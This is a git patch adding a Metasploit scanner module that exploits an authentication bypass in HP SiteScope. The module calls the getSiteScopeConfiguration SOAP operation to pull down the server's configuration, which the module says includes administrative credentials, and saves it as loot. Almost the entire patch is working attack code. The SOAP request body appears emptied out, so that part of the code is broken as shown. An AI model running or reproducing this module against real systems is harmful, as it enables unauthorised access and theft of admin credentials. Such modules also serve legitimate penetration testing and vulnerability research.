From 534ab55e5c484644918a2e45ab3b831d0ab6c48f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 5 Sep 2012 12:53:03 +0200 Subject: [PATCH] Added module for ZDI-12-173 --- .../hp_sitescope_getsitescopeconfiguration.rb | 131 ++++++++++++++++++ 1 file changed, 131 insertions(+) create mode 100644 modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb new file mode 100644 index 0000000000..4465a4a9e8 --- /dev/null +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -0,0 +1,131 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'HP SiteScope SOAP Call getSiteScopeConfiguration Configuration Access', + 'Description' => %q{ + This module exploits an authentication bypass vulnerability in HP SiteScope + which allows to retrieve the HP SiteScope configuration, including administrative + credentials. It is accomplished by calling the getSiteScopeConfiguration operation + available through the APISiteScopeImpl AXIS service. The HP SiteScope Configuration + is retrieved as a gzipped file containing Java serialization data. This module has + been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2. + }, + 'References' => + [ + #[ 'OSVDB', '' ], + [ 'BID', '55269' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-173/' ] + ], + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(8080), + + ], self.class) + + register_autofilter_ports([ 8080 ]) + deregister_options('RHOST') + end + + def rport + datastore['RPORT'] + end + + def run_host(ip) + res = send_request_cgi({ + 'uri' => '/SiteScope/services/APISiteScopeImpl', + 'method' => 'GET'}) + + if not res + print_error("#{rhost}:#{rport} - Unable to connect") + return + end + + access_configuration + end + + def access_configuration + print_status("#{rhost}:#{rport} - Connecting to SiteScope SOAP Interface") + + data = "" + "\r\n" + data << "" + "\r\n" + data << "" + "\r\n" + data << "" + "\r\n" + data << "" + "\r\n" + data << "" + + res = send_request_cgi({ + 'uri' => '/SiteScope/services/APISiteScopeImpl', + 'method' => 'POST', + 'ctype' => 'text/xml; charset=UTF-8', + 'data' => data, + 'headers' => { + 'SOAPAction' => '""', + }}) + + if res and res.code == 200 + + if res.headers['Content-Type'] =~ /boundary="(.*)"/ + boundary = $1 + end + if not boundary or boundary.empty? + print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + return + end + + if res.body =~ /getSiteScopeConfigurationReturn href="cid:([A-F0-9]*)"/ + cid = $1 + end + if not cid or cid.empty? + print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + return + end + + if res.body =~ /#{cid}>\r\n\r\n(.*)\r\n--#{boundary}/m + loot = Rex::Text.ungzip($1) + end + if not loot or loot.empty? + print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + return + end + + path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") + print_status("#{rhost}:#{rport} - HP SiteScope Configuration saved in #{path}") + print_status("#{rhost}:#{rport} - HP SiteScope Configuration is saved as Java serialization data") + return + end + + print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + end + +end +